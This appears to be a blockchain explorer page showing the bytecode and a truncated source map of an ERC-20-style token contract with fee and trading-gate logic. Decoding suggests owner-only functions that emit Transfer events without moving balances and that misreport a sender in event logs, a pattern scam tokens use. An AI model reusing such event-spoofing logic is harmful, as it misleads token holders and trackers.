0160149054906101000a900460ff1690805f0160159054906101000a900460ff16905083565b61068e610af3565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16146106f2576040517f9af2b10000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5f5b848490508110156107b15784848281811061071257610711611ab5565b5b905060200201602081019061072791906117bc565b73ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85858581811061078857610787611ab5565b5b9050602002013560405161079c91906115a0565b60405180910390a380806001019150506106f4565b505050505050565b6003602052805f5260405f205f915090505481565b6060600180546107dd9061186b565b80601f01602080910402602001604051908101604052809291908181526020018280546108099061186b565b80156108545780601f1061082b57610100808354040283529160200191610854565b820191905f5260205f20905b81548152906001019060200180831161083757829003601f168201915b5050505050905090565b60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b5f61088f338484610b5b565b905092915050565b61089f610af3565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16146108d5575f80fd5b600560159054906101000a900460ff16156108ee575f80fd5b5f737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801561094c573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906109709190611af6565b90505f737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156109d0573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906109f49190611af6565b90505f8273ffffffffffffffffffffffffffffffffffffffff1663e6a4390530846040518363ffffffff1660e01b8152600401610a32929190611b21565b602060405180830381865afa158015610a4d573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610a719190611af6565b90508060055f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506001600560156101000a81548160ff021916908315150217905550505050565b6004602052815f5260405f20602052805f5260405f205f91509150505481565b5f60025f015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b8160025f0160146101000a81548160ff021916908360ff1602179055508060025f0160156101000a81548160ff021916908360ff1602179055505050565b5f80610b65610af3565b9050600560159054906101000a900460ff1680610bad57508073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff16145b80610be357508073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16145b610beb575f80fd5b8260035f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f828254610c379190611a82565b9250508190555060055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16148015610ca75750600560149054906101000a900460ff16155b8015610d18575060646012600a610cbe91906119f7565b633b9aca00610ccd9190611a41565b610cd79190611b75565b60035f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205410155b8015610d5057508073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b15610fa0576001600560146101000a81548160ff0219169083151502179055505f600267ffffffffffffffff811115610d8c57610d8b611ba5565b5b604051908082528060200260200182016040528015610dba5781602001602082028036833780820191505090505b50905030815f81518110610dd157610dd0611ab5565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610e68573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610e8c9190611af6565b81600181518110610ea057610e9f611ab5565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663eb6f613960646012600a610f1a91906119f7565b633b9aca00610f299190611a41565b610f339190611b75565b5f8430426040518663ffffffff1660e01b8152600401610f57959493929190611ccb565b5f604051808303815f87803b158015610f6e575f80fd5b505af1158015610f80573d5f803e3d5ffd5b505050505f600560146101000a81548160ff021916908315150217905550505b5f8060025f0160149054906101000a900460ff1660025f0160159054906101000a900460ff16915091503073ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff1614158015611019575060011515600560159054906101000a900460ff161515145b156110fa575f606460055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168873ffffffffffffffffffffffffffffffffffffffff161461107b578361107d565b825b60ff168761108b9190611a41565b6110959190611b75565b905080866110a39190611a82565b95508060035f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8282546110f19190611d23565b92505081905550505b8460035f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8282546111469190611d23565b9250508190555060075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff160361122c578573ffffffffffffffffffffffffffffffffffffffff1660065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8760405161121f91906115a0565b60405180910390a3611372565b60075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff160361130b5760065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef876040516112fe91906115a0565b60405180910390a3611371565b8573ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8760405161136891906115a0565b60405180910390a35b5b600193505050509392505050565b5f81519050919050565b5f82825260208201905092915050565b5f5b838110156113b757808201518184015260208101905061139c565b5f8484015250505050565b5f601f19601f8301169050919050565b5f6113dc82611380565b6113e6818561138a565b93506113f681856020860161139a565b6113ff816113c2565b840191505092915050565b5f6020820190508181035f83015261142281846113d2565b905092915050565b5f80fd5b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f61145b82611432565b9050919050565b61146b81611451565b8114611475575f80fd5b50565b5f8135905061148681611462565b92915050565b5f819050919050565b61149e8161148c565b81146114a8575f80fd5b50565b5f813590506114b981611495565b92915050565b5f80604083850312156114d5576114d461142a565b5b5f6114e285828601611478565b92505060206114f3858286016114ab565b9150509250929050565b5f8115159050919050565b611511816114fd565b82525050565b5f60208201905061152a5f830184611508565b92915050565b5f60ff82169050919050565b61154581611530565b811461154f575f80fd5b50565b5f813590506115608161153c565b92915050565b5f6020828403121561157b5761157a61142a565b5b5f61158884828501611552565b91505092915050565b61159a8161148c565b82525050565b5f6020820190506115b35f830184611591565b92915050565b5f805f606084860312156115d0576115cf61142a565b5b5f6115dd86828701611478565b93505060206115ee86828701611478565b92505060406115ff868287016114ab565b9150509250925092565b61161281611530565b82525050565b5f60208201905061162b5f830184611609565b92915050565b61163a81611451565b82525050565b5f6060820190506116535f830186611631565b6116606020830185611609565b61166d6040830184611609565b949350505050565b5f80fd5b5f80fd5b5f80fd5b5f8083601f84011261169657611695611675565b5b8235905067ffffffffffffffff8111156116b3576116b2611679565b5b6020830191508360208202830111156116cf576116ce61167d565b5b9250929050565b5f8083601f8401126116eb576116ea611675565b5b8235905067ffffffffffffffff81111561170857611707611679565b5b6020830191508360208202830111156117245761172361167d565b5b9250929050565b5f805f805f606086880312156117445761174361142a565b5b5f61175188828901611478565b955050602086013567ffffffffffffffff8111156117725761177161142e565b5b61177e88828901611681565b9450945050604086013567ffffffffffffffff8111156117a1576117a061142e565b5b6117ad888289016116d6565b92509250509295509295909350565b5f602082840312156117d1576117d061142a565b5b5f6117de84828501611478565b91505092915050565b5f6020820190506117fa5f830184611631565b92915050565b5f80604083850312156118165761181561142a565b5b5f61182385828601611478565b925050602061183485828601611478565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061188257607f821691505b6020821081036118955761189461183e565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b600185111561191d578086048111156118f9576118f861189b565b5b60018516156119085780820291505b8081029050611916856118c8565b94506118dd565b94509492505050565b5f8261193557600190506119f0565b81611942575f90506119f0565b8160018114611958576002811461196257611991565b60019150506119f0565b60ff8411156119745761197361189b565b5b8360020a91508482111561198b5761198a61189b565b5b506119f0565b5060208310610133831016604e8410600b84101617156119c65782820a9050838111156119c1576119c061189b565b5b6119f0565b6119d384848460016118d4565b925090508184048111156119ea576119e961189b565b5b81810290505b9392505050565b5f611a018261148c565b9150611a0c83611530565b9250611a397fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484611926565b905092915050565b5f611a4b8261148c565b9150611a568361148c565b9250828202611a648161148c565b91508282048414831517611a7b57611a7a61189b565b5b5092915050565b5f611a8c8261148c565b9150611a978361148c565b9250828203905081811115611aaf57611aae61189b565b5b92915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b5f81519050611af081611462565b92915050565b5f60208284031215611b0b57611b0a61142a565b5b5f611b1884828501611ae2565b91505092915050565b5f604082019050611b345f830185611631565b611b416020830184611631565b9392505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f611b7f8261148c565b9150611b8a8361148c565b925082611b9a57611b99611b48565b5b828204905092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b5f819050919050565b5f819050919050565b5f611bfe611bf9611bf484611bd2565b611bdb565b61148c565b9050919050565b611c0e81611be4565b82525050565b5f81519050919050565b5f82825260208201905092915050565b5f819050602082019050919050565b611c4681611451565b82525050565b5f611c578383611c3d565b60208301905092915050565b5f602082019050919050565b5f611c7982611c14565b611c838185611c1e565b9350611c8e83611c2e565b805f5b83811015611cbe578151611ca58882611c4c565b9750611cb083611c63565b925050600181019050611c91565b5085935050505092915050565b5f60a082019050611cde5f830188611591565b611ceb6020830187611c05565b8181036040830152611cfd8186611c6f565b9050611d0c6060830185611631565b611d196080830184611591565b9695505050505050565b5f611d2d8261148c565b9150611d388361148c565b9250828201905080821115611d5057611d4f61189b565b5b9291505056fea26469706673582212207385afecabcf7e7c1119a82a01f3260e95f8d3b655975f9dfbc5d7efdaa6151464736f6c63430008160033

Deployed Bytecode

0x6080604052600436106100e0575f3560e01c80634feefd9b1161007e578063a8aa1b3111610058578063a8aa1b31146102c3578063a9059cbb146102ed578063c9567bf914610329578063dd62ed3e1461033f576100e7565b80634feefd9b1461023557806370a082311461025d57806395d89b4114610299576100e7565b806318160ddd116100ba57806318160ddd1461017957806323b872dd146101a3578063313ce567146101df5780634abe305214610209576100e7565b806306fdde03146100eb578063095ea7b314610115578063129e81e414610151576100e7565b366100e757005b5f80fd5b3480156100f6575f80fd5b506100ff61037b565b60405161010c919061140a565b60405180910390f35b348015610120575f80fd5b5061013b600480360381019061013691906114bf565b61040a565b6040516101489190611517565b60405180910390f35b34801561015c575f80fd5b5061017760048036038101906101729190611566565b6104f7565b005b348015610184575f80fd5b5061018d610570565b60405161019a91906115a0565b60405180910390f35b3480156101ae575f80fd5b506101c960048036038101906101c491906115b9565b610590565b6040516101d69190611517565b60405180910390f35b3480156101ea575f80fd5b506101f3610633565b6040516102009190611618565b60405180910390f35b348015610214575f80fd5b5061021d610638565b60405161022c93929190611640565b60405180910390f35b348015610240575f80fd5b5061025b6004803603810190610256919061172b565b610686565b005b348015610268575f80fd5b50610283600480360381019061027e91906117bc565b6107b9565b60405161029091906115a0565b60405180910390f35b3480156102a4575f80fd5b506102ad6107ce565b6040516102ba919061140a565b60405180910390f35b3480156102ce575f80fd5b506102d761085e565b6040516102e491906117e7565b60405180910390f35b3480156102f8575f80fd5b50610313600480360381019061030e91906114bf565b610883565b6040516103209190611517565b60405180910390f35b348015610334575f80fd5b5061033d610897565b005b34801561034a575f80fd5b5061036560048036038101906103609190611800565b610ad3565b60405161037291906115a0565b60405180910390f35b60605f80546103899061186b565b80601f01602080910402602001604051908101604052809291908181526020018280546103b59061186b565b80156104005780601f106103d757610100808354040283529160200191610400565b820191905f5260205f20905b8154815290600101906020018083116103e357829003601f168201915b5050505050905090565b5f8160045f3373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508273ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925846040516104e591906115a0565b60405180910390a36001905092915050565b6104ff610af3565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614610563576040517f9af2b10000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b61056d5f82610b1d565b50565b6012600a61057e91906119f7565b633b9aca0061058d9190611a41565b81565b5f8160045f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f3373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8282546106189190611a82565b9250508190555061062a848484610b5b565b90509392505050565b601281565b6002805f015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690805f0160149054906101000a900460ff1690805f0160159054906101000a900460ff16905083565b61068e610af3565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16146106f2576040517f9af2b10000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5f5b848490508110156107b15784848281811061071257610711611ab5565b5b905060200201602081019061072791906117bc565b73ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85858581811061078857610787611ab5565b5b9050602002013560405161079c91906115a0565b60405180910390a380806001019150506106f4565b505050505050565b6003602052805f5260405f205f915090505481565b6060600180546107dd9061186b565b80601f01602080910402602001604051908101604052809291908181526020018280546108099061186b565b80156108545780601f1061082b57610100808354040283529160200191610854565b820191905f5260205f20905b81548152906001019060200180831161083757829003601f168201915b5050505050905090565b60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b5f61088f338484610b5b565b905092915050565b61089f610af3565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16146108d5575f80fd5b600560159054906101000a900460ff16156108ee575f80fd5b5f737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801561094c573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906109709190611af6565b90505f737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156109d0573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906109f49190611af6565b90505f8273ffffffffffffffffffffffffffffffffffffffff1663e6a4390530846040518363ffffffff1660e01b8152600401610a32929190611b21565b602060405180830381865afa158015610a4d573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610a719190611af6565b90508060055f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506001600560156101000a81548160ff021916908315150217905550505050565b6004602052815f5260405f20602052805f5260405f205f91509150505481565b5f60025f015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b8160025f0160146101000a81548160ff021916908360ff1602179055508060025f0160156101000a81548160ff021916908360ff1602179055505050565b5f80610b65610af3565b9050600560159054906101000a900460ff1680610bad57508073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff16145b80610be357508073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16145b610beb575f80fd5b8260035f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f828254610c379190611a82565b9250508190555060055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16148015610ca75750600560149054906101000a900460ff16155b8015610d18575060646012600a610cbe91906119f7565b633b9aca00610ccd9190611a41565b610cd79190611b75565b60035f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205410155b8015610d5057508073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b15610fa0576001600560146101000a81548160ff0219169083151502179055505f600267ffffffffffffffff811115610d8c57610d8b611ba5565b5b604051908082528060200260200182016040528015610dba5781602001602082028036833780820191505090505b50905030815f81518110610dd157610dd0611ab5565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610e68573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610e8c9190611af6565b81600181518110610ea057610e9f611ab5565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663eb6f613960646012600a610f1a91906119f7565b633b9aca00610f299190611a41565b610f339190611b75565b5f8430426040518663ffffffff1660e01b8152600401610f57959493929190611ccb565b5f604051808303815f87803b158015610f6e575f80fd5b505af1158015610f80573d5f803e3d5ffd5b505050505f600560146101000a81548160ff021916908315150217905550505b5f8060025f0160149054906101000a900460ff1660025f0160159054906101000a900460ff16915091503073ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff1614158015611019575060011515600560159054906101000a900460ff161515145b156110fa575f606460055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168873ffffffffffffffffffffffffffffffffffffffff161461107b578361107d565b825b60ff168761108b9190611a41565b6110959190611b75565b905080866110a39190611a82565b95508060035f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8282546110f19190611d23565b92505081905550505b8460035f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8282546111469190611d23565b9250508190555060075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff160361122c578573ffffffffffffffffffffffffffffffffffffffff1660065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8760405161121f91906115a0565b60405180910390a3611372565b60075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff160361130b5760065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef876040516112fe91906115a0565b60405180910390a3611371565b8573ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8760405161136891906115a0565b60405180910390a35b5b600193505050509392505050565b5f81519050919050565b5f82825260208201905092915050565b5f5b838110156113b757808201518184015260208101905061139c565b5f8484015250505050565b5f601f19601f8301169050919050565b5f6113dc82611380565b6113e6818561138a565b93506113f681856020860161139a565b6113ff816113c2565b840191505092915050565b5f6020820190508181035f83015261142281846113d2565b905092915050565b5f80fd5b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f61145b82611432565b9050919050565b61146b81611451565b8114611475575f80fd5b50565b5f8135905061148681611462565b92915050565b5f819050919050565b61149e8161148c565b81146114a8575f80fd5b50565b5f813590506114b981611495565b92915050565b5f80604083850312156114d5576114d461142a565b5b5f6114e285828601611478565b92505060206114f3858286016114ab565b9150509250929050565b5f8115159050919050565b611511816114fd565b82525050565b5f60208201905061152a5f830184611508565b92915050565b5f60ff82169050919050565b61154581611530565b811461154f575f80fd5b50565b5f813590506115608161153c565b92915050565b5f6020828403121561157b5761157a61142a565b5b5f61158884828501611552565b91505092915050565b61159a8161148c565b82525050565b5f6020820190506115b35f830184611591565b92915050565b5f805f606084860312156115d0576115cf61142a565b5b5f6115dd86828701611478565b93505060206115ee86828701611478565b92505060406115ff868287016114ab565b9150509250925092565b61161281611530565b82525050565b5f60208201905061162b5f830184611609565b92915050565b61163a81611451565b82525050565b5f6060820190506116535f830186611631565b6116606020830185611609565b61166d6040830184611609565b949350505050565b5f80fd5b5f80fd5b5f80fd5b5f8083601f84011261169657611695611675565b5b8235905067ffffffffffffffff8111156116b3576116b2611679565b5b6020830191508360208202830111156116cf576116ce61167d565b5b9250929050565b5f8083601f8401126116eb576116ea611675565b5b8235905067ffffffffffffffff81111561170857611707611679565b5b6020830191508360208202830111156117245761172361167d565b5b9250929050565b5f805f805f606086880312156117445761174361142a565b5b5f61175188828901611478565b955050602086013567ffffffffffffffff8111156117725761177161142e565b5b61177e88828901611681565b9450945050604086013567ffffffffffffffff8111156117a1576117a061142e565b5b6117ad888289016116d6565b92509250509295509295909350565b5f602082840312156117d1576117d061142a565b5b5f6117de84828501611478565b91505092915050565b5f6020820190506117fa5f830184611631565b92915050565b5f80604083850312156118165761181561142a565b5b5f61182385828601611478565b925050602061183485828601611478565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061188257607f821691505b6020821081036118955761189461183e565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b600185111561191d578086048111156118f9576118f861189b565b5b60018516156119085780820291505b8081029050611916856118c8565b94506118dd565b94509492505050565b5f8261193557600190506119f0565b81611942575f90506119f0565b8160018114611958576002811461196257611991565b60019150506119f0565b60ff8411156119745761197361189b565b5b8360020a91508482111561198b5761198a61189b565b5b506119f0565b5060208310610133831016604e8410600b84101617156119c65782820a9050838111156119c1576119c061189b565b5b6119f0565b6119d384848460016118d4565b925090508184048111156119ea576119e961189b565b5b81810290505b9392505050565b5f611a018261148c565b9150611a0c83611530565b9250611a397fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484611926565b905092915050565b5f611a4b8261148c565b9150611a568361148c565b9250828202611a648161148c565b91508282048414831517611a7b57611a7a61189b565b5b5092915050565b5f611a8c8261148c565b9150611a978361148c565b9250828203905081811115611aaf57611aae61189b565b5b92915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b5f81519050611af081611462565b92915050565b5f60208284031215611b0b57611b0a61142a565b5b5f611b1884828501611ae2565b91505092915050565b5f604082019050611b345f830185611631565b611b416020830184611631565b9392505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f611b7f8261148c565b9150611b8a8361148c565b925082611b9a57611b99611b48565b5b828204905092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b5f819050919050565b5f819050919050565b5f611bfe611bf9611bf484611bd2565b611bdb565b61148c565b9050919050565b611c0e81611be4565b82525050565b5f81519050919050565b5f82825260208201905092915050565b5f819050602082019050919050565b611c4681611451565b82525050565b5f611c578383611c3d565b60208301905092915050565b5f602082019050919050565b5f611c7982611c14565b611c838185611c1e565b9350611c8e83611c2e565b805f5b83811015611cbe578151611ca58882611c4c565b9750611cb083611c63565b925050600181019050611c91565b5085935050505092915050565b5f60a082019050611cde5f830188611591565b611ceb6020830187611c05565b8181036040830152611cfd8186611c6f565b9050611d0c6060830185611631565b611d196080830184611591565b9695505050505050565b5f611d2d8261148c565b9150611d388361148c565b9250828201905080821115611d5057611d4f61189b565b5b9291505056fea26469706673582212207385afecabcf7e7c1119a82a01f3260e95f8d3b655975f9dfbc5d7efdaa6151464736f6c63430008160033

Deployed Bytecode Sourcemap

1443:5480:4:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;4930:91;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4578:207;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3129:174;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;1585:68;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4347:223;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1543:35;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1769:26;;;;;;;;;;;;;:::i;:::-;;;;;;;;;:::i;:::-;;;;;;;;3311:370;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;2086:44;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5029:95;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2210:19;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4793:129;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3964:375;;;;;;;;;;;;;:::i;:::-;;2137:64;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4930:91;4975:13;5008:5;5001:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;4930:91;:::o;4578:207::-;4646:4;4696:6;4663:9;:21;4673:10;4663:21;;;;;;;;;;;;;;;:30;4685:7;4663:30;;;;;;;;;;;;;;;:39;;;;4739:7;4718:37;;4727:10;4718:37;;;4748:6;4718:37;;;;;;:::i;:::-;;;;;;;;4773:4;4766:11;;4578:207;;;;:::o;3129:174::-;3203:29;:27;:29::i;:::-;3189:43;;:10;:43;;;3185:69;;3241:13;;;;;;;;;;;;;;3185:69;3265:30;3290:1;3293;3265:24;:30::i;:::-;3129:174;:::o;1585:68::-;1576:2;1639;:14;;;;:::i;:::-;1623:13;:30;;;;:::i;:::-;1585:68;:::o;4347:223::-;4463:4;4511:6;4480:9;:15;4490:4;4480:15;;;;;;;;;;;;;;;:27;4496:10;4480:27;;;;;;;;;;;;;;;;:37;;;;;;;:::i;:::-;;;;;;;;4535:27;4545:4;4551:2;4555:6;4535:9;:27::i;:::-;4528:34;;4347:223;;;;;:::o;1543:35::-;1576:2;1543:35;:::o;1769:26::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::o;3311:370::-;3492:29;:27;:29::i;:::-;3478:43;;:10;:43;;;3474:69;;3530:13;;;;;;;;;;;;;;3474:69;3559:9;3554:120;3578:8;;:15;;3574:1;:19;3554:120;;;3638:8;;3647:1;3638:11;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;3620:42;;3629:7;3620:42;;;3651:7;;3659:1;3651:10;;;;;;;:::i;:::-;;;;;;;;3620:42;;;;;;:::i;:::-;;;;;;;;3595:3;;;;;;;3554:120;;;;3311:370;;;;;:::o;2086:44::-;;;;;;;;;;;;;;;;;:::o;5029:95::-;5076:13;5109:7;5102:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;5029:95;:::o;2210:19::-;;;;;;;;;;;;;:::o;4793:129::-;4857:4;4881:33;4891:10;4903:2;4907:6;4881:9;:33::i;:::-;4874:40;;4793:129;;;;:::o;3964:375::-;4029:29;:27;:29::i;:::-;4015:43;;:10;:43;;;4007:52;;;;;;4079:11;;;;;;;;;;;4078:12;4070:21;;;;;;4102:16;2311:42;4121:24;;;:26;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;4102:45;;4158: